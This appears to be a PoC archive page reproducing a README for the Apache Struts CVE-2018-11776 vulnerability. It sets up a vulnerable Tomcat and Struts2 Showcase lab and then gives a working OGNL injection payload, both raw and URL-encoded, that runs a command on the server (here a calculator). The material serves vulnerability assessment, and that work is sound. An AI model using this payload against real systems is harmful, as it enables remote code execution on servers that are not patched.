关联漏洞
标题:
Apache Struts 输入验证错误漏洞
(CVE-2018-11776)
描述:Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。 Apache Struts 2.3版本至2.3.34版本和2.5版本至2.5.16版本中存在输入验证漏洞
描述
Creating a vulnerable environment and the PoC
介绍
# CVE-2018-11776
Proof of Concept exploit so I could quickly assess what sorts of protections and fixes are available.
Originally found by Man Yue Mo, Semmle: https://semmle.com/news/apache-struts-CVE-2018-11776
Semmle had a "Apache Struts RCE - CVE-2018-11776 - PoC Exploit Demo" YouTube video up for a bit, but I believe it's gone or, at least, no longer linked to Semmle: https://www.youtube.com/watch?v=5SDNX20SLJ0
Took information from the above and then started looking at the commits to the struts repo: https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5
I'm too lazy to Docker or whatever the fuck...
## Setting up and Exploiting a Vulnerable Host
### Download latest Ubuntu Desktop ISO and create a virtual machine.
http://releases.ubuntu.com/18.04.1/ubuntu-18.04.1-desktop-amd64.iso?_ga=2.265574989.317727484.1535056103-825490018.1535056103
### Install dependencies:
sudo apt-get update
sudo apt-get upgrade
sudo apt-get dist-upgrade
sudo apt-get install default-jdk vim net-tools
### Set up Tomcat:
mkdir ~/sources
cd ~/sources
wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
tar xvzf apache-tomcat-7.0.90.tar.gz
sudo mv apache-tomcat-7.0.90 /opt/tomcat
### Update bashrc with variables:
vim ~/.bashrc
export JAVA_HOME=/usr/lib/jvm/default-java
export CATALINA_HOME=/opt/tomcat
. ~/.bashrc
### Add an admin to the Tomact gui:
sudo vim /opt/tomcat/conf/tomcat-users.xml
<user username="username" password="password" roles="manager-gui,admin-gui" />
### Get a vulnerable Struts2 Showcase so we have something to work with:
cd ~/sources
wget http://central.maven.org/maven2/org/apache/struts/struts2-showcase/2.3.14/struts2-showcase-2.3.14.war
### Deploy the WAR file through the Tomcat gui:
$CATALINA_HOME/bin/shutdown.sh
$CATALINA_HOME/bin/startup.sh
http://127.0.0.1:8080/manager/html
### Restart Tomcat and check that the Struts2 Showcase is available:
$CATALINA_HOME/bin/shutdown.sh
$CATALINA_HOME/bin/startup.sh
http://127.0.0.1:8080/manager/html
### Add a vulnerable redirection action without a namespace:
vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml
<action name="help">
<result type="redirectAction">
<param name="actionName">date.action</param>
</result>
</action>
date.action is already defined, so we just added another redirect action that calls date.action
By default, alwaysSelectFullNamespace should be set to True.
### Restart Tomcat and check out the Struts2 Showcase page:
$CATALINA_HOME/bin/shutdown.sh
$CATALINA_HOME/bin/startup.sh
http://127.0.0.1:8080/struts2-showcase-2.3.14/showcase.jsp
### Create OGNL expression to do stuff. Let's do what Semmle probably did in their YouTube video:
%{(#_memberAccess['allowStaticMethodAccess'] = true).(#rt = @java.lang.Runtime@getRuntime()).(#rt.exec('gnome-calculator'))}
### OGNL expression needs to be URL-encoded and stuck in before the last '/' in the URL, hitting our vulnerable help.action:
127.0.0.1:8080/struts2-showcase-2.3.14/\<encoded-command-goes-here\>/help.action
127.0.0.1:8080/struts2-showcase-2.3.14/%25%7B%28%23%5F%6D%65%6D%62%65%72%41%63%63%65%73%73%5B%27%61%6C%6C%6F%77%53%74%61%74%69%63%4D%65%74%68%6F%64%41%63%63%65%73%73%27%5D%20%3D%20%74%72%75%65%29%2E%28%23%72%74%20%3D%20%40%6A%61%76%61%2E%6C%61%6E%67%2E%52%75%6E%74%69%6D%65%40%67%65%74%52%75%6E%74%69%6D%65%28%29%29%2E%28%23%72%74%2E%65%78%65%63%28%27%67%6E%6F%6D%65%2D%63%61%6C%63%75%6C%61%74%6F%72%27%29%29%7D/help.action
Executing on the vulnerable Ubuntu host, we should see a new calc instance pop up.
### Related commits fixing the issue:
https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5
## Thoughts:
Another extremely specific, vulnerable implementation of struts. The media coverage of this vulnerability had everyone freaking out, though only the sloppiest code/configs are really vulnerable... I can't think of an efficient, stealthy way of reliably finding this vulnerability and/or exploiting it. My recommendation: just fucking upgrade struts... (or stop using it)
文件快照
[4.0K] /data/pocs/542d1dd8d4930e557133dd3ef5b5d496b79f15e7
└── [4.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。